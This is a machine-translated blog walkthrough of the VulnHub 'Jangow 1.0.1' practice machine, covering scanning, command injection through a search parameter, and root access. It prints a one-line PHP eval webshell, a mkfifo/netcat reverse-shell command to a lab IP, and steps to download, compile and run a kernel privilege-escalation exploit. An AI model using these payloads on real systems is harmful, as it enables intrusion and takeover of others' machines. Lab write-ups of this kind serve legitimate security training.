当前位置:网站首页>[vulnhub range] janchow: 1.0.1
[vulnhub range] janchow: 1.0.1
2022-06-10 19:00:00 【Nailaoyyds】
Catalog
Remember a kali The double card IP Don't show problems
One 、 information gathering
Jangow1.0.1 Drone aircraft IP:192.168.56.118
kali attack IP: 192.168.56.102The start is for IP Of

nmap scanning


Get the open port and service of the target host Two 、web penetration

Look for function points
go in site file , Discover function points
http://192.168.56.118/site/busque.php?buscar=
Try command execution whoami
http://192.168.56.118/site/busque.php?buscar=whoami
It is found that the command can be executed
Check the password file
cat/etc/passwd

But you can only view files , Can't log in . The next step is needed
Write a word Trojan
Write a word Trojan
echo '<?php @eval ($_POST["123"]);?>' >>shell.php
Ant sword connection

3、 ... and 、 exploit victory
Search for sensitive files


Four 、 Elevated privileges
Some files do not have permission to view , Do permission promotion
Bounce shell
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>Bounce shell
Rebound success

upgrade shell, Become interactive
python3 -c 'import pty;pty.spawn("/bin/bash")'
uname -a
Get version number 
Raise the right
According to the system version
searchsploit ubuntu 4.4.0
use 45010.c This document carries out the right raising
The ant sword uploads the file to the target plane
Download link
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip 
Ant sword upload 
gcc 45010.c -o exp // Generate executable files
chmod +x exp // Add executable rights
./exp // perform exp file

Get into root Catalog
Find files


5、 ... and 、 Get flag


边栏推荐
- [Code] neural symbol generation machine
- In the digital era, how can enterprises manage data security and ensure the security of data assets
- [QNX hypervisor 2.2 user manual] 3.3 configure guest
- VMware horizon 82111 deployment series (XVI) blast bandwidth test
- Linked List
- 3. Golang并发入门
- SaleSmartly | 再添新渠道Slack,助你拉近客户关系
- && 与 ||
- In 2021, the world's top ten analog IC suppliers: Ti ranked first, and skyworks' revenue growth was the highest
- 华为云鲲鹏DevKit代码迁移实战
猜你喜欢

SaleSmartly | 再添新渠道Slack,助你拉近客户关系

基于谱加权的波束方向图分析

Cross domain error: when allowcredentials is true, allowedorigins cannot contain the special value "*“

Adobe Premiere基础-介绍,配置,快捷键,创建项目,创建序列(一)

Stream流的常用方法-Lambder

vcsa7u3c安装教程

商业智能BI如何帮企业降低人力、时间和管理成本?

Request header field xxxx is not allowed by Access-Control-Allow-Headers in preflight response问题

In the era of data processing, data analysis has become the basic construction

Request header field XXXX is not allowed by access control allow headers in preflight response
随机推荐
Use of uiautomator2 automated test tool
5. golang generics and reflection
【QNX Hypervisor 2.2 用户手册】3.2.3 ACPI表和FDT
Stream生成的3张方式-Lambda
微信小程序,获取当前页面,判断当前页面是不是tabbar页面
数字化时代,企业为什么要做数字化转型?
Ibox system development core functions and some core source codes
Huawei cloud Kunpeng devkit code migration practice
[Code] neural symbol generation machine
Adobe Premiere Foundation (track related) (V)
商业智能BI在企业的价值之:业务分析发展决策
Metadata management, the basic construction of enterprises in the digital era
Wechat applet, get the current page and judge whether the current page is a tabbar page
Adobe Premiere Basic - tool use (select tools, rasoir tools, and other Common Tools) (III)
Real time business intelligence Bi (II): reasonable ETL architecture design to realize quasi real time Business Intelligence BI
第四章 数据类型(三)
Adobe Premiere基础特效(卡点和转场)(四)
Beam pattern analysis based on spectral weighting
& and||
uniapp uview 框架的form表单,输入校验手机号、校验微信号